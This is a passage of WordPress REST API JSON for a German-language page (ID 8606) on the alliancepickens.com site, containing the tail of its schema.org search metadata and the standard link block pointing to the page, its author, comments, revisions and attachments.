County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8606","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=8606"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8606\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=8606"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}